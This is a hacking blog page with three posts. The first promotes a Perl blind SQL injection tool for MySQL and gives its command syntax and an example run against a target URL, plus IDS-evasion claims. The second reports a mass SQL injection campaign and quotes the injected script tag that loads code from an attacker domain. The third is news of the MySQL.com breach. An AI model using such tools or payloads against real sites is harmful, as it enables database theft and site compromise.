Jan
03
2012
This script uses blind SQL injection and boolean enumeration to perform INFORMATION_SCHEMA Mapping.
Syntax:
perl mysql5enum.pl -h [hostname] -u [url] [-q [query]]
Example:
perl mysql5enum.pl -h www.target.tld -u http://www.target.tld/vuln.ext?input=24 -q “select system_user()”
Description:
– By default, this script will first determine username, version and database name before enumerating the information_schema information.
– When the -q flag is applied, a user can supply any query that returns only a single cell.
– If the exploit or vulnerability requires a single quote, simply tack %27 to the end of the URI.
– This script contains error detection: It will only work on a mysql 5.x database, and knows when its queries have syntax errors.
– This script uses perl’s LibWhisker2 for IDS Evasion (The same as Nikto).
– This script uses the MD5 algorithm for optimization. There are other optimization methods, and this may not work on all sites.
Download: mysql5enum.pl.zip
Tags: Blind SQL Injection, Database Hacking, Hacking Tool, Hacking Tools, Hacktools, MySQL Attack, MySQL Enumeration, MySQL Hacking, MySQL Injection, SQL Enumeration Tool, SQL Injection, SQL Injection Attack, SQL Injection Tool
Filed in Database Hacking, Hacking Tools, Input Validation Attacks | Prasanna Sherekar | Comments Off
Jan
01
2012
A SQL attack which is increasing at extremely fast rates has been uncovered by ISC ( Internet Storm Center ) has seen to raise from just a few hundred pages to over 1 million in just a few weeks.
From the past few weeks of going over submitted results and information from interweb users they have put together some interesting data, one it seems to be targeting windows based servers and from the logs it seems they had been doing a bit of probing around within the weeks before the sites been injected with a special string:
“></title><script src=”hXXp://lilupophilupop.com/sl.php”></script>
They have also put together fairly solid base of ccTLD’s statistics of which have been infected (as shown below) -
- UK – 56,300
- NL – 123,000
- DE – 49,700
- FR – 68,100
- DK – 31,000
- CN – 505
- CA – 16,600
- COM – 30,500
- RU – 32,000
- JP – 23,200
- ORG – 2,690
At the moment it looks like it is partially automated and partially manual. The manual component and the number of sites infected suggests a reasonable size work force or a long preparation period.
If you want to find out if you have a problem just search for “<script src=”http://lilupophilupop.com/” in google and use the site: parameter to hone in on your domain.
Original Findings and Comments: ISC Diary | SQL Injection Attack happening ATM
Tags: Lilupophilupop, Lilupophilupop Attack, Lilupophilupop Injection, Lilupophilupop SQL Injection, Lilupophilupop.com Attack, Lilupophilupop.com SQL Injection, News, SQL Injection, SQL Injection Attack, Stories
Filed in Database Hacking, Google Hacking, Hackers, Stories/News, Website Hacking | Prasanna Sherekar | Comments Off
Mar
28
2011
MySQL.com, the official website of the database management system of the same name, was today subjected to an attack whereby hackers used SQL injection exploits to gain access to a complete list of usernames and passwords on the site.
News of the attack surfaced when the attackers posted details of the compromise on the Full Disclosure mailing list, publicly listing the contents of database tables used to store member and employee data, but also a small sample of user logins and password hashes.

Owned by Oracle, MySQL is used by millions of websites to store and deliver information, with some of the most popular online services and platforms including WordPress and Joomla utilising the software.
The attack was achieved using “blind SQL injection”, targeting MySQL.com, MySQL.fr, MySQL.de and MySQL.it, but also two Sun domains.
It appears that the attacks were not due to flaws in the MySQL software itself, but flaws in the implementation of their websites.
Tags: Blind SQL Injection, MySQL Injection, MySQL Website Hack, MySQL.com Hack, MySQL.com Hacked, News, Oracle, SQL Injection, SQL Injection Attack, Stories, Sun
Filed in Database Hacking, Input Validation Attacks, Stories/News | Prasanna Sherekar | Comments Off